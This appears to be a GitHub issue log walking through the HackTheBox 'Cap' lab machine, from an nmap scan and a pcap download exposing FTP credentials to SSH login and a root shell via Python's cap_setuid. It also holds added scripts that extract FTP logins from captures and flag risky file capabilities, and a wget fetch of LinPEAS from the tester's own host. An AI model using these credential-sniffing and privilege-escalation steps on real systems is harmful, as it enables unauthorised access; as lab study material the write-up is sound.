roaris / ctf-log


HackTheBox: Cap (Machine Easy) #24

Open roaris opened 8 months ago

roaris commented 8 months ago

https://app.hackthebox.com/machines/Cap

$ nmap -sC -sV -Pn 10.10.10.245
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-11 23:05 JST
Nmap scan report for 10.10.10.245
Host is up (0.51s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 fa:80:a9:b2:ca:3b:88:69:a4:28:9e:39:0d:27:d5:75 (RSA)
|   256 96:d8:f8:e3:e8:f7:71:36:c5:49:d5:9d:b6:a4:c9:0c (ECDSA)
|_  256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 (ED25519)
80/tcp open  http    gunicorn
|_http-server-header: gunicorn
|_http-title: Security Dashboard
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.0 404 NOT FOUND
|     Server: gunicorn
|     Date: Mon, 11 Mar 2024 14:06:58 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 232
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
|     <title>404 Not Found</title>
|     <h1>Not Found</h1>
|     <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
|   GetRequest:
|     HTTP/1.0 200 OK
|     Server: gunicorn
|     Date: Mon, 11 Mar 2024 14:06:49 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 19386
|     <!DOCTYPE html>
|     <html class="no-js" lang="en">
|     <head>
|     <meta charset="utf-8">
|     <meta http-equiv="x-ua-compatible" content="ie=edge">
|     <title>Security Dashboard</title>
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <link rel="shortcut icon" type="image/png" href="/static/images/icon/favicon.ico">
|     <link rel="stylesheet" href="/static/css/bootstrap.min.css">
|     <link rel="stylesheet" href="/static/css/font-awesome.min.css">
|     <link rel="stylesheet" href="/static/css/themify-icons.css">
|     <link rel="stylesheet" href="/static/css/metisMenu.css">
|     <link rel="stylesheet" href="/static/css/owl.carousel.min.css">
|     <link rel="stylesheet" href="/static/css/slicknav.min.css">
|     <!-- amchar
|   HTTPOptions:
|     HTTP/1.0 200 OK
|     Server: gunicorn
|     Date: Mon, 11 Mar 2024 14:06:50 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Allow: GET, OPTIONS, HEAD
|     Content-Length: 0
|   RTSPRequest:
|     HTTP/1.1 400 Bad Request
|     Connection: close
|     Content-Type: text/html
|     Content-Length: 196
|     <html>
|     <head>
|     <title>Bad Request</title>
|     </head>
|     <body>
|     <h1><p>Bad Request</p></h1>
|     Invalid HTTP Version &#x27;Invalid HTTP Version: &#x27;RTSP/1.0&#x27;&#x27;
|     </body>
|_    </html>
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port80-TCP:V=7.94SVN%I=7%D=3/11%Time=65EF0FF6%P=x86_64-pc-linux-gnu%r(G
SF:etRequest,2A0C,"HTTP/1\.0\x20200\x20OK\r\nServer:\x20gunicorn\r\nDate:\
SF:x20Mon,\x2011\x20Mar\x202024\x2014:06:49\x20GMT\r\nConnection:\x20close
SF:\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:\x20
SF:19386\r\n\r\n<!DOCTYPE\x20html>\n<html\x20class=\"no-js\"\x20lang=\"en\
SF:">\n\n<head>\n\x20\x20\x20\x20<meta\x20charset=\"utf-8\">\n\x20\x20\x20
SF:\x20<meta\x20http-equiv=\"x-ua-compatible\"\x20content=\"ie=edge\">\n\x
SF:20\x20\x20\x20<title>Security\x20Dashboard</title>\n\x20\x20\x20\x20<me
SF:ta\x20name=\"viewport\"\x20content=\"width=device-width,\x20initial-sca
SF:le=1\">\n\x20\x20\x20\x20<link\x20rel=\"shortcut\x20icon\"\x20type=\"im
SF:age/png\"\x20href=\"/static/images/icon/favicon\.ico\">\n\x20\x20\x20\x
SF:20<link\x20rel=\"stylesheet\"\x20href=\"/static/css/bootstrap\.min\.css
SF:\">\n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20href=\"/static/css/
SF:font-awesome\.min\.css\">\n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\
SF:x20href=\"/static/css/themify-icons\.css\">\n\x20\x20\x20\x20<link\x20r
SF:el=\"stylesheet\"\x20href=\"/static/css/metisMenu\.css\">\n\x20\x20\x20
SF:\x20<link\x20rel=\"stylesheet\"\x20href=\"/static/css/owl\.carousel\.mi
SF:n\.css\">\n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20href=\"/stati
SF:c/css/slicknav\.min\.css\">\n\x20\x20\x20\x20<!--\x20amchar")%r(HTTPOpt
SF:ions,B3,"HTTP/1\.0\x20200\x20OK\r\nServer:\x20gunicorn\r\nDate:\x20Mon,
SF:\x2011\x20Mar\x202024\x2014:06:50\x20GMT\r\nConnection:\x20close\r\nCon
SF:tent-Type:\x20text/html;\x20charset=utf-8\r\nAllow:\x20GET,\x20OPTIONS,
SF:\x20HEAD\r\nContent-Length:\x200\r\n\r\n")%r(RTSPRequest,121,"HTTP/1\.1
SF:\x20400\x20Bad\x20Request\r\nConnection:\x20close\r\nContent-Type:\x20t
SF:ext/html\r\nContent-Length:\x20196\r\n\r\n<html>\n\x20\x20<head>\n\x20\
SF:x20\x20\x20<title>Bad\x20Request</title>\n\x20\x20</head>\n\x20\x20<bod
SF:y>\n\x20\x20\x20\x20<h1><p>Bad\x20Request</p></h1>\n\x20\x20\x20\x20Inv
SF:alid\x20HTTP\x20Version\x20&#x27;Invalid\x20HTTP\x20Version:\x20&#x27;R
SF:TSP/1\.0&#x27;&#x27;\n\x20\x20</body>\n</html>\n")%r(FourOhFourRequest,
SF:189,"HTTP/1\.0\x20404\x20NOT\x20FOUND\r\nServer:\x20gunicorn\r\nDate:\x
SF:20Mon,\x2011\x20Mar\x202024\x2014:06:58\x20GMT\r\nConnection:\x20close\
SF:r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:\x202
SF:32\r\n\r\n<!DOCTYPE\x20HTML\x20PUBLIC\x20\"-//W3C//DTD\x20HTML\x203\.2\
SF:x20Final//EN\">\n<title>404\x20Not\x20Found</title>\n<h1>Not\x20Found</
SF:h1>\n<p>The\x20requested\x20URL\x20was\x20not\x20found\x20on\x20the\x20
SF:server\.\x20If\x20you\x20entered\x20the\x20URL\x20manually\x20please\x2
SF:0check\x20your\x20spelling\x20and\x20try\x20again\.</p>\n");
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 201.55 seconds

The "p" in OpenSSH 8.2p1 apparently stands for "portable" https://qiita.com/t_nakayama0714/items/c312bc5edcce6c214856#openssh

roaris commented 8 months ago

Looking at port 80, an application that looks like a network profiler comes up.

It apparently uses a WordPress theme called Colorlib.

Clicking Security Snapshot lets you download a pcap file, but it only contains the most recent packets, so checking it in Wireshark does not turn up anything like an FTP ID/password.

roaris commented 8 months ago

I looked into vulnerabilities for vsftpd 3.0.3 and OpenSSH 8.2p1, but there was nothing usable. I also ran gobuster, but nothing in particular.

roaris commented 8 months ago

Apparently the Download button is what to focus on. It has onclick="location.href='/download/3'".

Sending a GET /download/3 request returns a response whose Content-Type is application/vnd.tcpdump.pcap.

When an unknown Content-Type is specified, the browser downloads the file https://qiita.com/yutoo89/items/c59a6a920b1bd6a72d59

roaris commented 8 months ago

Accessing /download/0 in the browser lets you download 0.pcap. Looking at 0.pcap in Wireshark, the FTP ID/password turn out to be nathan/Buck3tH4TF0RM3!
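As an added example (not part of roaris's notes), the script below does offline what the Wireshark step above does by hand: it walks a classic libpcap file such as the ones served from /download/<n>, reassembles each client-to-server FTP control stream in capture order, pairs every USER with the PASS that follows it, and records whether the server side of that connection ever answered 230. It handles only the .pcap container (not pcapng) with Ethernet/IPv4/TCP frames. The capture embedded at the bottom is constructed for the demo: the server address 10.10.10.245 is the box, the client address and port are assumptions.

```python
"""Pull FTP USER/PASS pairs out of a classic libpcap capture.
Added example; the sample capture at the bottom is constructed, not real."""
import struct
import sys
from collections import defaultdict

LINKTYPE_ETHERNET = 1


def iter_frames(data):
    """Yield each captured frame from a classic .pcap file (either byte order)."""
    (magic,) = struct.unpack("<I", data[:4])
    if magic in (0xA1B2C3D4, 0xA1B23C4D):     # little-endian (usec or nsec timestamps)
        end = "<"
    elif magic in (0xD4C3B2A1, 0x4D3CB2A1):   # big-endian
        end = ">"
    else:
        raise ValueError("not a classic libpcap file (pcapng is not handled here)")
    (linktype,) = struct.unpack(end + "I", data[20:24])
    if linktype != LINKTYPE_ETHERNET:
        raise ValueError(f"unsupported link type {linktype}")
    off = 24
    while off + 16 <= len(data):
        _, _, incl_len, _ = struct.unpack(end + "IIII", data[off:off + 16])
        off += 16
        yield data[off:off + incl_len]
        off += incl_len


def tcp_tuple(frame):
    """Return (src, sport, dst, dport, payload) for an IPv4/TCP frame, else None."""
    if len(frame) < 34 or frame[12:14] != b"\x08\x00":   # not IPv4
        return None
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4
    if ip[9] != 6:                                       # not TCP
        return None
    (total_len,) = struct.unpack("!H", ip[2:4])
    tcp = ip[ihl:total_len]                              # drops any Ethernet padding
    if len(tcp) < 20:
        return None
    sport, dport = struct.unpack("!HH", tcp[:4])
    doff = (tcp[12] >> 4) * 4
    src = ".".join(map(str, ip[12:16]))
    dst = ".".join(map(str, ip[16:20]))
    return src, sport, dst, dport, tcp[doff:]


def extract_ftp_logins(pcap, ftp_port=21):
    """Reassemble each control connection and pair USER with the PASS that follows.
    'success' is True if the server side of that connection replied 230 at any point."""
    to_server = defaultdict(bytes)    # keyed (client, cport, server, sport)
    from_server = defaultdict(bytes)  # same key so both directions line up
    for frame in iter_frames(pcap):
        parsed = tcp_tuple(frame)
        if parsed is None:
            continue
        src, sport, dst, dport, payload = parsed
        if dport == ftp_port:
            to_server[(src, sport, dst, dport)] += payload
        elif sport == ftp_port:
            from_server[(dst, dport, src, sport)] += payload
    logins = []
    for key, stream in to_server.items():
        replies = from_server.get(key, b"").decode("latin-1").splitlines()
        user = None
        for line in stream.decode("latin-1").splitlines():
            verb, _, arg = line.partition(" ")
            if verb.upper() == "USER":
                user = arg.strip()
            elif verb.upper() == "PASS" and user is not None:
                logins.append({"client": key[0], "server": key[2], "user": user,
                               "password": arg.strip(),
                               "success": any(r.startswith("230") for r in replies)})
                user = None
    return logins


# --- constructed sample capture (not a real file from the box) ---------------
def _frame(src, sport, dst, dport, payload):
    """Minimal Ethernet/IPv4/TCP frame; checksums are deliberately left zero."""
    eth = b"\x00" * 12 + b"\x08\x00"
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40 + len(payload), 0, 0, 64, 6, 0,
                     bytes(map(int, src.split("."))), bytes(map(int, dst.split("."))))
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, 0x18, 8192, 0, 0)
    return eth + ip + tcp + payload


def build_pcap(frames):
    """Wrap frames in a little-endian classic pcap container."""
    out = bytearray(struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET))
    for i, f in enumerate(frames):
        out += struct.pack("<IIII", 1_700_000_000 + i, 0, len(f), len(f)) + f
    return bytes(out)


SERVER, CLIENT, CPORT = "10.10.10.245", "10.10.14.7", 36232   # client side is assumed
SAMPLE_PCAP = build_pcap([
    _frame(SERVER, 21, CLIENT, CPORT, b"220 (vsFTPd 3.0.3)\r\n"),
    _frame(CLIENT, CPORT, SERVER, 21, b"USER nathan\r\n"),
    _frame(SERVER, 21, CLIENT, CPORT, b"331 Please specify the password.\r\n"),
    _frame(CLIENT, CPORT, SERVER, 21, b"PASS Buck3tH4TF0RM3!\r\n"),
    _frame(SERVER, 21, CLIENT, CPORT, b"230 Login successful.\r\n"),
])

if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_PCAP
    for hit in extract_ftp_logins(data):
        print(hit)
```

Run it as `python3 ftp_creds.py 0.pcap` against a downloaded capture, or with no argument to use the embedded sample. Pairing on the control connection rather than grepping for "PASS" keeps a password attached to the username and session it belongs to, and the 230 check separates a working credential from a failed attempt.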

roaris commented 8 months ago

Logging in to FTP with the credentials obtained above, user.txt is there.

$ ftp 10.10.10.245
Connected to 10.10.10.245.
220 (vsFTPd 3.0.3)
Name (10.10.10.245:roaris): nathan
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
229 Entering Extended Passive Mode (|||27892|)
150 Here comes the directory listing.
-r--------    1 1001     1001           33 Mar 11 14:37 user.txt
226 Directory send OK.
ftp> get user.txt
local: user.txt remote: user.txt
229 Entering Extended Passive Mode (|||46821|)
150 Opening BINARY mode data connection for user.txt (33 bytes).
100% |*******************************************************************************************************************************|    33        0.18 KiB/s    00:00 ETA
226 Transfer complete.
33 bytes received in 00:00 (0.04 KiB/s)
ftp> exit
221 Goodbye.

roaris commented 8 months ago

/root cannot be accessed.

ftp> pwd
Remote directory: /home/nathan
ftp> cd ../..
250 Directory successfully changed.
ftp> dir
229 Entering Extended Passive Mode (|||10566|)
150 Here comes the directory listing.
lrwxrwxrwx    1 0        0               7 Jul 31  2020 bin -> usr/bin
drwxr-xr-x    4 0        0            4096 Jul 23  2021 boot
drwxr-xr-x    2 0        0            4096 May 23  2021 cdrom
drwxr-xr-x   18 0        0            4000 Mar 11 14:37 dev
drwxr-xr-x   92 0        0            4096 Jul 23  2021 etc
drwxr-xr-x    3 0        0            4096 May 23  2021 home
lrwxrwxrwx    1 0        0               7 Jul 31  2020 lib -> usr/lib
lrwxrwxrwx    1 0        0               9 Jul 31  2020 lib32 -> usr/lib32
lrwxrwxrwx    1 0        0               9 Jul 31  2020 lib64 -> usr/lib64
lrwxrwxrwx    1 0        0              10 Jul 31  2020 libx32 -> usr/libx32
drwx------    2 0        0           16384 Sep 23  2020 lost+found
drwxr-xr-x    2 0        0            4096 Jun 01  2021 media
drwxr-xr-x    2 0        0            4096 May 23  2021 mnt
drwxr-xr-x    2 0        0            4096 May 23  2021 opt
dr-xr-xr-x  264 0        0               0 Mar 11 14:37 proc
drwx------    6 0        0            4096 Mar 11 14:37 root
drwxr-xr-x   27 0        0             800 Mar 11 14:37 run
lrwxrwxrwx    1 0        0               8 Jul 31  2020 sbin -> usr/sbin
drwxr-xr-x    6 0        0            4096 May 23  2021 snap
drwxr-xr-x    3 0        0            4096 May 23  2021 srv
dr-xr-xr-x   13 0        0               0 Mar 11 14:37 sys
drwxrwxrwt   12 0        0            4096 Mar 11 15:24 tmp
drwxr-xr-x   15 0        0            4096 May 23  2021 usr
drwxr-xr-x   14 0        0            4096 May 23  2021 var
226 Directory send OK.
ftp> cd root
550 Failed to change directory.

roaris commented 8 months ago

SSH apparently has password authentication enabled, and you can log in with nathan/Buck3tH4TF0RM3!. sudo -l is not allowed.

$ ssh nathan@10.10.10.245
The authenticity of host '10.10.10.245 (10.10.10.245)' can't be established.
ED25519 key fingerprint is SHA256:UDhIJpylePItP3qjtVVU+GnSyAZSr+mZKHzRoKcmLUI.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.245' (ED25519) to the list of known hosts.
nathan@10.10.10.245's password:
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-80-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Mon Mar 11 15:39:56 UTC 2024

  System load:           0.0
  Usage of /:            36.6% of 8.73GB
  Memory usage:          21%
  Swap usage:            0%
  Processes:             225
  Users logged in:       0
  IPv4 address for eth0: 10.10.10.245
  IPv6 address for eth0: dead:beef::250:56ff:feb9:ca45

  => There are 2 zombie processes.

 * Super-optimized for small spaces - read how we shrank the memory
   footprint of MicroK8s to make it the smallest full K8s around.

   https://ubuntu.com/blog/microk8s-memory-optimisation

63 updates can be applied immediately.
42 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable

The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Thu May 27 11:21:27 2021 from 10.10.14.7
nathan@cap:~$ sudo -l
[sudo] password for nathan:
Sorry, user nathan may not run sudo on cap.

roaris commented 8 months ago

Apparently LinPEAS is the tool to use. I could not install linpeas.sh on the machine side.

nathan@cap:~$ wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
--2024-03-11 15:43:01--  https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
Resolving github.com (github.com)... failed: Temporary failure in name resolution.
wget: unable to resolve host address ‘github.com’

So I installed linpeas.sh on the Kali Linux side and shared it with the machine via python -m http.server 8000.

nathan@cap:~$ wget 10.10.16.5:8000/linpeas.sh
--2024-03-11 15:49:03--  http://10.10.16.5:8000/linpeas.sh
Connecting to 10.10.16.5:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 860549 (840K) [text/x-sh]
Saving to: ‘linpeas.sh’

linpeas.sh                                 100%[========================================================================================>] 840.38K   688KB/s    in 1.2s

2024-03-11 15:49:05 (688 KB/s) - ‘linpeas.sh’ saved [860549/860549]

nathan@cap:~$ ls
linpeas.sh  user.txt
nathan@cap:~$ chmod +x linpeas.sh

roaris commented 8 months ago

As with WinPEAS, there is far too much output.

Apparently this is the part to focus on.

Files with capabilities (limited to 50):
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep

What matters, apparently, is that /usr/bin/python3.8 has cap_setuid. Linux apparently has a thing called capabilities https://qiita.com/Brutus/items/37d942214b4c6edd08df Capabilities can be checked with the getcap command.

nathan@cap:~$ getcap /usr/bin/python3.8
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip

setuid changes the user ID of the running process https://man7.org/linux/man-pages/man2/setuid.2.html cap_setuid means having the privilege to perform setuid.
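As an added example (not from roaris's notes), the script below decodes the `security.capability` extended attribute that `getcap` and LinPEAS read, prints it in getcap's notation, and flags the capabilities that are enough for privilege escalation on their own. The byte layout is the kernel's `vfs_cap_data` / `vfs_ns_cap_data` from include/uapi/linux/capability.h; the sample blobs at the bottom are constructed to match the getcap lines in the LinPEAS output above, plus one revision-3 blob with a user-namespace root id that the page does not show.

```python
"""Decode security.capability (what getcap reads) and flag escalation-capable
file capabilities.  Added example; the sample blobs are constructed."""
import os
import struct

VFS_CAP_REVISION_MASK = 0xFF000000
VFS_CAP_FLAGS_EFFECTIVE = 0x00000001   # one flag: the whole permitted set becomes effective at exec

# bit numbers from include/uapi/linux/capability.h
CAP_NAMES = {
    0: "cap_chown", 1: "cap_dac_override", 2: "cap_dac_read_search", 3: "cap_fowner",
    4: "cap_fsetid", 5: "cap_kill", 6: "cap_setgid", 7: "cap_setuid", 8: "cap_setpcap",
    9: "cap_linux_immutable", 10: "cap_net_bind_service", 11: "cap_net_broadcast",
    12: "cap_net_admin", 13: "cap_net_raw", 14: "cap_ipc_lock", 15: "cap_ipc_owner",
    16: "cap_sys_module", 17: "cap_sys_rawio", 18: "cap_sys_chroot", 19: "cap_sys_ptrace",
    20: "cap_sys_pacct", 21: "cap_sys_admin", 22: "cap_sys_boot", 23: "cap_sys_nice",
    24: "cap_sys_resource", 25: "cap_sys_time", 26: "cap_sys_tty_config", 27: "cap_mknod",
    28: "cap_lease", 29: "cap_audit_write", 30: "cap_audit_control", 31: "cap_setfcap",
    32: "cap_mac_override", 33: "cap_mac_admin", 34: "cap_syslog", 35: "cap_wake_alarm",
    36: "cap_block_suspend", 37: "cap_audit_read", 38: "cap_perfmon", 39: "cap_bpf",
    40: "cap_checkpoint_restore",
}
# Caps that on their own let an unprivileged user become root or read/write
# anything on the host; cap_setuid is the one that matters on Cap.
ESCALATION_CAPS = {
    "cap_setuid", "cap_setgid", "cap_dac_override", "cap_dac_read_search", "cap_chown",
    "cap_fowner", "cap_sys_admin", "cap_sys_ptrace", "cap_sys_module", "cap_sys_rawio",
    "cap_setfcap",
}


def parse_vfs_cap(blob):
    """Decode struct vfs_cap_data / vfs_ns_cap_data (little-endian on disk).
    Returns (permitted, inheritable, effective, rootid); sets are 64-bit masks."""
    (magic_etc,) = struct.unpack("<I", blob[:4])
    revision = magic_etc & VFS_CAP_REVISION_MASK
    effective = bool(magic_etc & VFS_CAP_FLAGS_EFFECTIVE)
    words = {0x01000000: 1, 0x02000000: 2, 0x03000000: 2}.get(revision)
    if words is None:
        raise ValueError(f"unknown vfs cap revision {revision:#x}")
    permitted = inheritable = 0
    for i in range(words):
        p, h = struct.unpack("<II", blob[4 + 8 * i:12 + 8 * i])
        permitted |= p << (32 * i)
        inheritable |= h << (32 * i)
    # revision 3 appends the uid that counts as "root" for these caps (user-namespace caps)
    rootid = struct.unpack("<I", blob[20:24])[0] if revision == 0x03000000 else 0
    return permitted, inheritable, effective, rootid


def bits(mask):
    return [n for n in range(64) if mask >> n & 1]


def render(permitted, inheritable, effective):
    """Format like getcap, grouping caps that share the same e/i/p flags."""
    groups = {}
    for n in bits(permitted | inheritable):
        flags = ("e" if effective and permitted >> n & 1 else "") \
              + ("i" if inheritable >> n & 1 else "") \
              + ("p" if permitted >> n & 1 else "")
        groups.setdefault(flags, []).append(CAP_NAMES.get(n, f"cap_{n}"))
    return " ".join(f"{','.join(names)}+{flags}" for flags, names in groups.items())


def risky_caps(permitted):
    """Permitted caps that are sufficient for privilege escalation, in bit order."""
    return [CAP_NAMES[n] for n in bits(permitted) if CAP_NAMES.get(n) in ESCALATION_CAPS]


def scan(paths):
    """Read file caps from real files (Linux; reading this xattr needs no privilege)."""
    findings = []
    for path in paths:
        try:
            blob = os.getxattr(path, "security.capability")
        except (OSError, AttributeError):   # no caps set, missing file, or not Linux
            continue
        perm, inh, eff, _ = parse_vfs_cap(blob)
        findings.append((path, render(perm, inh, eff), risky_caps(perm)))
    return findings


# --- constructed sample blobs mirroring the getcap lines in the LinPEAS output ---
def make_vfs_cap(permitted, inheritable, effective=True, rootid=None):
    rev = 0x03000000 if rootid is not None else 0x02000000
    blob = struct.pack("<IIIII", rev | (VFS_CAP_FLAGS_EFFECTIVE if effective else 0),
                       permitted & 0xFFFFFFFF, inheritable & 0xFFFFFFFF,
                       permitted >> 32, inheritable >> 32)
    return blob + (struct.pack("<I", rootid) if rootid is not None else b"")


SAMPLE_PYTHON38 = make_vfs_cap((1 << 7) | (1 << 10), (1 << 7) | (1 << 10))  # +eip
SAMPLE_PING = make_vfs_cap(1 << 13, 0)                                       # +ep
SAMPLE_NS_ADMIN = make_vfs_cap(1 << 21, 0, rootid=100000)  # rev 3: root only inside a userns
```

Run `scan(["/usr/bin/python3.8", "/usr/bin/ping"])` on the box to reproduce the two getcap lines. The "e" flag is why the exploit in the next comment needs no extra step: at exec the permitted set is raised into the effective set, so os.setuid(0) succeeds immediately. The file carries cap_setuid but not cap_setgid, which is why the resulting shell reports uid=0 with gid=1001(nathan). The fix on the defending side is simply `setcap -r /usr/bin/python3.8`.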

roaris commented 8 months ago

Launching /usr/bin/python3.8, changing the uid to 0 and then starting bash gives a root shell.

nathan@cap:~$ /usr/bin/python3.8
Python 3.8.5 (default, Jan 27 2021, 15:41:15)
[GCC 9.3.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import os
>>> os.setuid(0)
>>> os.system("/bin/bash")
root@cap:~# id
uid=0(root) gid=1001(nathan) groups=1001(nathan)
root@cap:~# cd /root
root@cap:/root# ls
root.txt  snap